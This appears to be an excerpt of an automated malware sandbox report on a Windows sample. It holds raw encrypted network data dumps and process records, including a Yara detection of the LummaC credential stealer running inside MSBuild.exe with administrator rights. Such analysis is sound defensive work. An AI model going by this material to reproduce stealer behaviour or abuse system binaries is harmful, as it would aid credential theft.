                    2025-03-17 07:20:20 UTC1369INData Raw: fb f3 db e5 e5 56 a7 b3 b2 c1 c0 52 04 8f 29 5b 55 a6 0b 58 60 b9 30 35 35 32 a5 a3 2c 3f 6f f5 cd 21 18 09 3f 7e 92 0f 88 23 8e 96 7b 3c 48 30 f9 e2 bf a5 6d 35 cf de a3 2f 11 1e d3 c4 88 db dd d7 28 9d 3d 31 c0 29 41 5e 52 eb 00 7f 4b f3 bb 10 e1 ae 31 53 dd 15 41 eb 82 07 2f 8f cc 99 3a 01 10 a1 5b 19 14 59 2c e7 9a d9 e8 b8 17 70 20 eb 9f 33 7c c6 c7 fd aa e8 7d ef 50 7c 24 95 ad fa 20 47 3f 80 ab 84 81 8e b2 e1 25 75 23 6c 0b ae c6 b6 af ef d4 2e 2b 87 03 b8 19 c3 48 a8 58 65 10 6c 0f 1c 3a f2 07 30 6c 62 94 b0 9b 3c 5f cb c1 6c ce 39 51 04 c1 d8 8b c2 0c d2 42 96 67 62 f7 ea b1 12 8e 47 5c 51 ac 50 a9 9d d9 15 1c 51 be 44 fd b0 e4 f7 8f 09 8d 4f 9f 29 8a 14 b3 0c 7e aa 2d 66 5e 58 87 c3 38 02 b4 40 11 81 33 11 f3 95 db c4 db 0d f1 63 72 fd 85 e5 f3
                    Data Ascii: VR)[UX`0552,?o!?~#{<H0m5/(=1)A^RK1SA/:[Y,p 3|}P|$ G?%u#l.+HXel:0lb<_l9QBgbG\QPQDO)~-f^X8@3cr
                    2025-03-17 07:20:20 UTC1369INData Raw: e7 13 6b e6 8a 06 ad ec 55 85 ed 33 19 b7 01 dd 41 ed fd 7d 2a 9c e1 cd cb a7 bc 95 73 b1 24 82 76 75 f1 99 0f 3a a3 07 97 a6 6a bf 25 c0 2e b6 6c ff 2d e0 11 a1 dd 2f fa 9b b9 60 3d f7 cf 39 80 96 a4 ea 40 e0 e5 67 2f 98 89 16 4e 52 89 e4 a8 d6 5e c4 8b 15 00 2c 0b de 10 38 5a e7 1b 5c 9d 43 4a 79 31 e4 eb fc 31 e8 57 da 72 68 50 b5 08 5f 94 63 98 e3 e9 4d e4 47 df b8 58 7c 38 39 7f 3a c3 07 f3 7d 61 54 3d 25 9b 51 7c 1a 7f 6e 6b 9a 1f 75 97 96 71 ac 64 8e f8 94 c4 e7 7d 89 8c 5b d4 f1 6e fd c2 3a f3 87 1e 03 36 f5 47 c9 e9 20 c4 6f 4a a3 7e 3a 20 68 04 fa 15 ca f7 a3 11 2d 95 85 b4 e3 3c 58 10 e4 da b5 44 aa 7f 9f eb d3 13 ec 7c 78 62 95 25 4f 95 5d 7b e8 0f 6c 14 19 d4 ff cd 8e 5b 43 d6 24 87 4b c4 d6 e4 83 91 af 9d 3a 0a 1c 86 2d 0d d9 6a f8 38 97 ea
                    Data Ascii: kU3A}*s$vu:j%.l-/`=9@g/NR^,8Z\CJy11WrhP_cMGX|89:}aT=%Q|nkuqd}[n:6G oJ~: h-<XD|xb%O]{l[C$K:-j8
                    2025-03-17 07:20:20 UTC1369INData Raw: 63 ca 6d ee 7a 84 fc da d7 9f 57 00 c2 8a 52 03 c3 3b eb e5 fd 2f 2d d3 03 89 5e 92 c3 05 a7 04 97 c1 b0 c0 25 ca a0 b7 99 cf 1b 48 58 ec 2e 22 f7 f2 c8 44 70 02 b9 94 70 20 4d 81 0f db 96 0a 50 80 cd 2c 82 02 5b 00 25 1b e6 92 6b 38 34 f0 11 50 7a 3b 62 1b 89 6f 24 05 f2 c3 37 11 4b 78 1a e1 25 0a 60 45 0d 72 98 e0 30 7c 92 1b b4 70 e2 ae f9 78 90 45 15 29 35 0e 0b e7 c2 98 ef 7b d2 3f 89 53 3e 96 cc 5b e1 3c a5 98 bb ab 2f ba be 77 1d bf c5 5f e4 91 16 b8 06 c2 c8 b7 11 b4 a6 49 1a 90 49 64 52 90 99 c2 7c 6a 00 ea b4 b4 41 7e 0b 2b ee 5c ce bb 67 c8 9c f5 9a c4 42 e7 a2 bf 40 0e 09 f5 48 e5 c3 4b f4 c2 a5 07 b0 5b b0 40 a7 bb d3 36 c2 c7 12 8b 73 b6 21 86 5d e1 77 78 1e c8 70 af 0c b4 1b bd 46 52 cd 83 8e 98 46 1c cd f6 99 4e fc 71 2b b6 2c c4 8a 10 1d
                    Data Ascii: cmzWR;/-^%HX."Dpp MP,[%k84Pz;bo$7Kx%`Er0|pxE)5{?S>[</w_IIdR|jA~+\gB@HK[@6s!]wxpFRFNq+,
                    2025-03-17 07:20:20 UTC1369INData Raw: 39 de 13 94 f0 35 a9 b7 06 91 1a 0e b3 6e c6 92 f9 56 ce 2e 2b fa 59 29 96 51 69 47 16 72 69 c4 8e 21 85 d6 2a 92 72 4a 7d 05 27 3b a3 0a c9 d3 e8 04 9a ce f9 72 bc 88 fc d4 d9 70 d5 c8 4e ab 79 0a 1d 61 55 0e 07 da 77 b9 5b 5a 2c 5c 8b f6 ae 8b b2 de 86 0b ee a3 b2 5e b6 d0 78 12 9c 4e b7 f3 47 ee c2 25 24 0f a7 64 57 b9 8e 8b 10 f0 6b b5 6c 56 43 ac 86 b7 0e 39 86 cc 0a f8 74 09 03 6b be 7e 8a 3f 21 d7 5b a6 3b a5 65 1a 7c c0 59 f3 ea 2f 31 98 02 79 71 ef 4d 0f c1 9f e3 f1 2e 8f 8a 3c 93 2d 2b 1e 3e 3f f5 6f 0f c5 31 ad e9 ee b4 6f 67 20 25 f3 b3 82 fd 41 4e 62 d8 ba ee 09 2f 24 bf 84 59 49 03 3c a4 93 c3 98 34 d7 5f b2 81 ff 97 52 9d f7 83 26 5b b6 02 5d 5e c5 d8 04 0a 2e a5 ef 66 c6 2b 8b 91 8c b2 88 c2 27 7c a1 da ad b7 c6 1b 12 91 dc 91 e1 ea 0b c3
                    Data Ascii: 95nV.+Y)QiGri!*rJ}';rpNyaUw[Z,\^xNG%$dWklVC9tk~?![;e|Y/1yqM.<-+>?o1og %ANb/$YI<4_R&[]^.f+'|
                    2025-03-17 07:20:20 UTC1369INData Raw: ef 7a 67 c8 45 85 de 4f 9b 06 66 60 8e 9d 20 0d 65 7f 23 8e 56 9c 94 b0 5c 07 96 ca a9 0e 35 bf a7 49 bc fd 83 48 dd 34 76 8d dc 38 28 9e 37 51 68 33 d6 9d 1e d9 bd f5 de e6 c8 88 1a 9b c8 62 8b eb f2 ab 32 ea 40 ef e7 82 f0 ff 61 3c 8b 8d 3b 17 17 0b da 99 38 dc b7 3b 31 78 ed 84 fc cf 92 af 39 c5 10 7d 54 bc 4e 70 65 99 a2 c6 3a 93 4c 3a 44 6c 9b 7d b5 66 7d 31 9b 37 cd 3b 4b 98 40 bb 0c 0a f5 08 dd ae 4f c5 2c a8 50 bf 3e 8f d5 13 af 81 65 fc 3e f0 a5 50 c0 2a 84 bc 78 ac e0 28 30 67 24 24 a2 f6 47 5f 24 54 bd f7 72 1b fe 7f c6 8b 43 c2 9b 34 6d fc 3c 4c 5b eb cf 89 f8 af 70 41 ff 93 e9 55 ab ab 4e 52 d1 dc 3d 11 e3 9e 55 68 5f bb ef 42 98 89 7e 31 81 2b c4 33 a4 32 d4 b1 8e da 62 a3 f0 1f 39 44 7b dd ce 77 4c 1f e6 ec 94 eb 6e c5 4b 46 45 c2 0b 9a 40
                    Data Ascii: zgEOf` e#V\5IH4v8(7Qh3b2@a<;8;1x9}TNpe:L:Dl}f}17;K@O,P>e>P*x(0g$$G_$TrC4m<L[pAUNR=Uh_B~1+32b9D{wLnKFE@
                    2025-03-17 07:20:20 UTC1369INData Raw: 35 1e 2d 2e ac 14 8c f3 bd f5 f8 ec 5d a1 39 2c 02 17 c5 84 a7 41 94 a7 aa e0 2f 8a f1 6f 1b b0 31 30 dc bf 58 7c 32 c9 59 9d 0e 65 2c f8 db 77 86 19 3a ca 7d de a8 50 42 0d 96 32 f3 56 46 3f 44 74 21 d9 a3 27 59 2c 37 95 eb 95 73 c9 a8 97 97 8a 57 5e ea 66 55 90 42 8e 5b e4 26 66 04 dd 3f bd 62 58 2b 21 5c 25 3e a3 ee e4 5d c1 f7 00 de cd ae 22 e8 c1 80 0b ae 21 0d d2 96 e5 4d 73 f7 49 a5 da da cb 1f fc 2b c5 79 6f 35 f5 67 6a 0c 7a 34 27 8c 8c f5 e6 5e 94 17 d0 96 38 d2 5e 1d f5 6a 9e 15 8f b4 b0 bf 95 68 ee d3 76 e3 34 31 62 b8 5e 5c b5 a3 cc b8 c5 03 27 ac 9c b4 4f a2 3e 8f f5 32 1a 88 b7 e6 8b c3 56 4a 9e 6f d2 b2 aa 79 9c 3b 78 e6 7c 9a 6d ae 5c 1d b2 07 6f fc 0e 72 1b 5d 1c e2 aa 75 dc e0 8d 71 3e be 47 d8 34 d6 fa da e7 2e 9f 23 4f 84 4b d7 71 51
                    Data Ascii: 5-.]9,A/o10X|2Ye,w:}PB2VF?Dt!'Y,7sW^fUB[&f?bX+!\%>]"!MsI+yo5gjz4'^8^jhv41b^\'O>2VJoy;x|m\or]uq>G4.#OKqQ
                    2025-03-17 07:20:20 UTC1369INData Raw: d9 8b d5 46 a8 12 98 04 8b 0d 96 a8 1d 14 9f 79 ec 26 aa 15 3e 68 84 35 80 a7 05 86 03 f1 9f 13 aa 1e 94 6f a0 c8 6a b0 de 39 c6 47 0e 05 a1 38 e8 7b 35 a3 8e 06 ed d7 4f 24 6f f5 fc e2 88 a3 40 af 81 36 d1 81 53 c8 da 64 8d 07 1e de 0f f5 fe 5c ef c1 88 24 eb b3 34 7b 51 ab 76 59 0d 8e d3 6e 39 b3 4a 0f 8b e0 b9 f4 90 76 54 91 87 70 4d 8c f2 98 ea 0f 10 0c 99 a7 77 1e 3b c9 3c b6 df 6c d9 85 73 73 8c 28 f6 b2 67 3b a6 43 2e 2c 78 f1 11 fd fa 76 7c 64 b5 6d 05 fd 45 f2 7a 2a 70 8d c4 cf 31 77 85 e0 64 84 9b c0 c3 66 cf 38 83 53 ee 26 6a fc 12 b9 eb 86 fb 0a 72 5e 03 0c 4d 28 44 8d 85 25 bb 9f 41 48 9c 07 e4 8d 0b 24 fc 3d a8 a4 b7 1b e0 46 00 f3 9b d9 9d a9 02 a6 16 17 0c 2f a1 e7 51 df b5 93 5d 21 90 30 d1 b8 cf 89 a8 ea 31 99 01 2c 87 38 b0 78 8f b7 9f
                    Data Ascii: Fy&>h5oj9G8{5O$o@6Sd\$4{QvYn9JvTpMw;<lss(g;C.,xv|dmEz*p1wdf8S&jr^M(D%AH$=F/Q]!01,8x
                    2025-03-17 07:20:20 UTC343INData Raw: dc 8c d1 d1 fc 33 52 eb 8e 97 69 c4 35 00 22 2e 40 3e 5e f0 ae a3 9b bd 35 15 74 b9 f3 e8 37 58 98 f8 c4 de 58 4d 8a b3 ba 5f cb 56 6a 67 12 11 ee 18 54 11 bc 56 59 a8 3e d8 88 c7 d0 5f 72 f0 05 0d 70 8a 5e bb 65 78 dd 84 9c 6f 44 4f 47 ba e5 35 d0 e5 6c 3d bf 3f 67 21 04 0d 65 2c 9f 6c 78 7c e0 a4 1d 55 22 6c 65 74 5e 31 70 01 a1 08 fb ae aa 4e 31 6a 7f e7 ef 67 45 3b 06 5a 70 9b f0 cf 10 69 3f 39 fd 8d 67 54 0d 48 9a 01 aa 74 20 3c f8 29 bf 37 db a1 91 c0 69 8c d4 21 ca ac 9e 71 99 1c fb 5b 3b 93 e7 cd 5b 8c fb e0 26 8c c3 5a 69 2a e2 73 fc 46 23 ce a5 7b 53 a2 64 f2 9a 1c f0 df 3c ed 86 d5 11 3e 81 27 a0 91 fc e1 e0 f7 a2 65 1f 44 e2 09 62 cc b9 1f 13 40 fa a4 d8 3f c3 e5 bf f9 94 61 e2 8a a0 ea d0 b7 02 17 47 17 f8 12 3b e0 ba 28 15 b4 3f 53 2d 37 1b
                    Data Ascii: 3Ri5".@>^5t7XXM_VjgTVY>_rp^exoDOG5l=?g!e,lx|U"let^1pN1jgE;Zpi?9gTHt <)7i!q[;[&Zi*sF#{Sd<>'eDb@?aG;(?S-7


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:03:20:09
                    Start date:17/03/2025
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exe"
                    Imagebase:0x7ff748ae0000
                    File size:588'288 bytes
                    MD5 hash:B18D980CFDCE9F0758CDC8DB9E7F6BF4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:03:20:09
                    Start date:17/03/2025
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff62fc20000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:03:20:09
                    Start date:17/03/2025
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Imagebase:0xa30000
                    File size:262'432 bytes
                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2421617824.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Reset < >